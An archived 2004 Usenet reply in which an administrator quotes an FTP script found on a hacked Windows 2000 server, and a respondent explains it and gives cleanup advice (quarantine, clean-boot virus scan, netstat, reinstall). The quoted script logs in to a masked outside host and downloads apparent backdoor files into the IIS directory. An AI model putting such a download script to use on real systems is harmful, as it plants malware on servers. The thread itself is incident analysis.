Re: One of my W2K servers hacked?

Tech-Archive recommends: Repair Windows Errors & Optimize Windows Performance

From: Alexander Mattausch (Alexander.Mattausch_at_physik.uni-erlangen.de)
Date: 11/12/04 

Date: Fri, 12 Nov 2004 15:25:52 +0100

serge wrote:

> I inherited servers : W2K, W2003, no, no SBS in this network.
> Can i still ask the question here?
>
> I was browsing one W2K server and i found a hidden folder in C: Drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how can i verify
> if this hacker has left backdoors, trojan horses etc...?

This appears to me as FTP commands. Did you replace the IP address in the
file with x.x.x.x? In principle, these are the commands that you need to
copy the listed files from the server x.x.x.x:33333, logging in as user
hack with password hack, to the directory c:\winnt\system32\inetsrv\data.
If there is a webserver running, it is possible that these files are
accessible from the internet.

As a first step you should remove these files, if they exist, from this
directory. Do not delete them, you might want to analyze them (e.g. a virus
scanner could be able to tell you which virus/trojan/backdoor it is).

It definitely is an idea to scan the full harddisk with a virus scanner.
This should be done by booting from a clean disk, e.g. a bootable CD with a
virus scanner (don't forget to update the signatures). But if this scanner
does not find anything, you are not necessarily free of any backdoors.

And, as Marina and Kevin suggested, run netstat to look for any open ports.

But if there is only the slightest hint that the system was compromised, you
have to remove the server from the internet immediately and reinstall as
soon as possible.

Regards, Alex

Relevant Pages

  • Re: Security - ciphers - autentification
    ... ABC, then my auth reply will be based also on this account, and I will have ... Or server auth string will be combined from accounts/time/.... ... this will make direct server hack hard. ... Hack firewall - there is nothing except ...
    (SecProg)
  • Re: Anti-Virus on Terminal Server 2003 POP3 email
    ... you want a virus scanner that would be installed on the client machine to scan e-mail going to Outlook on the remote machine. ... Unless the user then copied the attachment to the local machine, the virus scanner would not see e-mail or attachments, just encrypted graphics that are used to draw them. ... What you need is an enterprise class virus scanner for the server that you run concurrently with the Outlook session and does POP3 e-mail scanning. ...
    (microsoft.public.windows.terminal_services)
  • Re: Java and avoiding software piracy?
    ... and have to admit requiring an internet ... connection isnt bad, seeing how the user has to download the ... will pay for it and others will find a way to hack it. ... the server for license verification, ...
    (comp.lang.java.programmer)
  • Re: EFS error msg copying a file locally
    ... It's going to a server that doesn't ... > There is a registry hack that turns ... > Without this hack, I can't run my backup script. ... > Does anyone have this registry setting? ...
    (microsoft.public.windowsxp.security_admin)
  • Re: Will Palm Pre work with Mac OS X?
    ... Sync with *what exactly* on the cloud/web? ... On a server about which you have no information as to the ... The employees and ex employees all have access. ... they wanted to, hack these servers. ...
    (comp.sys.palmtops.pilot)